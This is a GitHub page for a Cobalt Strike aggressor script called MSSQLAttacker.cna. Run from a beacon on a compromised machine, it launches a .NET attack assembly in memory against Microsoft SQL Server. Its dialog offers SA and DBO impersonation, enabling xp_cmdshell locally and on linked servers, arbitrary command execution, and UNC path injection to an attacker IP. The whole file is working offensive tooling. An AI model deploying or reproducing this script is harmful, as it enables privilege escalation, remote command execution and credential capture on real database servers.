-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathMSSQLAttacker.cna
125 lines (110 loc) · 3.61 KB
/
MSSQLAttacker.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
$assembly = script_resource("MSSQLAttacker.exe");
popup beacon_bottom {
item "MSSQLAttacker" {
runMSSQLAttacker($1);
}
}
sub runMSSQLAttacker {
$bid = $1;
$dialog = dialog("MSSQL-Attacker", %(TargetInstance => "localhost", UserName => "",Password => "",Database => "master"), lambda({
$Attack = $3["Attacks"];
if ($3["TargetInstance"] ne $null) {
$TargetInstance = $3["TargetInstance"];
$TargetInstance = "-t $TargetInstance";
} else {
$TargetInstance = "-t localhost";
}
if ($3["Database"] ne $null) {
$Database = $3["Database"];
$Database = "-d $Database";
} else {
$Database = "-d master";
}
$command = "cli $TargetInstance $Database -a $Attack";
if ($3["UserName"] ne $null && $3["Password"] ne $null) {
$command = "$command $UserName $Password";
}
if ($3["ImpersonateSA"] eq "true") {
$command ="$command -impersonateSA";
}
if ($3["ImpersonateDBO"] eq "true") {
if ($3["dbo"] eq $null) {
error("Database Name (DBO)");
return;
}
$dbo = $3["dbo"];
$command = "$command -impersonateDBO -dbo $dbo";
}
if ($Attack eq "checklinkedserverVersion"){
if ($3["ls"] eq $null) {
error("Linked Server");
return;
}
$linkedServer = $3["ls"];
$command = "$command -ls $linkedServer";
}
if ($Attack eq "togglelinkedcmdshell"){
if ($3["ls"] eq $null) {
error("Linked Server");
return;
}
$linkedServer = $3["ls"];
$command = "$command -ls $linkedServer";
}
if ($Attack eq "runCustomQuery"){
if ($3["customQuery"] eq $null) {
error("customQuery");
return;
}
$customQuery = $3["customQuery"];
$command = "$command -query \"$customQuery\"";
}
if ($Attack eq "execlinkedcmd"){
if ($3["ls"] eq $null || $3["cmd"] eq $null) {
error("Linked Server || CMD");
return;
}
$linkedServer = $3["ls"];
$cmd = $3["cmd"];
$command = "$command -ls $linkedServer -c $cmd";
}
if ($Attack eq "uncpathinject"){
if ($3["lh"] eq $null) {
error("LHOST (Attacker IP)");
return;
}
$lhost = $3["lh"];
$command = "$command -l $lhost";
}
if ($Attack eq "execcmd"){
if ($3["cmd"] eq $null) {
error("Command");
return;
}
$cmd = $3["cmd"];
$command = "$command -c $cmd";
}
binput($bid, "execute-assembly $assembly $command");
bexecute_assembly($bid, $assembly, $command);
})
);
dialog_description($dialog, "MSSQL-Attacker V2 by Rikunj Sindhwad");
drow_combobox($dialog, "Attacks", "Attacks:", @("getinfo","checkimpersonate","checklinkedservers","checklinkedserverVersion","uncpathinject","togglecmdshell","togglelinkedcmdshell","execlinkedcmd","execcmd","runCustomQuery"));
drow_text($dialog, "TargetInstance", "TargetInstance: ");
drow_text($dialog, "UserName", "[Optional] UserName: ");
drow_text($dialog, "Password", "[Optional] Password: ");
drow_text($dialog, "Database", "[Optional] DatabaseName: ");
drow_text($dialog, "dbo", "[Optional] DatabaseName (Impersonation): ");
drow_text($dialog, "ls", "[Optional] Linked Server: ");
drow_text($dialog, "lh", "[Optional] LHOST (uncpathinject): ");
drow_text($dialog, "cmd", "[Optional] Command: ");
drow_text($dialog, "customQuery", "[Optional] Custom Query: ");
drow_checkbox($dialog, "ImpersonateSA", "Impersonate SA Before Attack", "ImpersonateSA");
drow_checkbox($dialog, "ImpersonateDBO", "Impersonate DBO Before Attack", "ImpersonateDBO");
dbutton_action($dialog, "Run");
dbutton_help($dialog, "https://github.com/RikunjSindhwad/MSSQL-Attacker/blob/main/README.md");
dialog_show($dialog);
}
sub error {
show_message("Missing $1");
}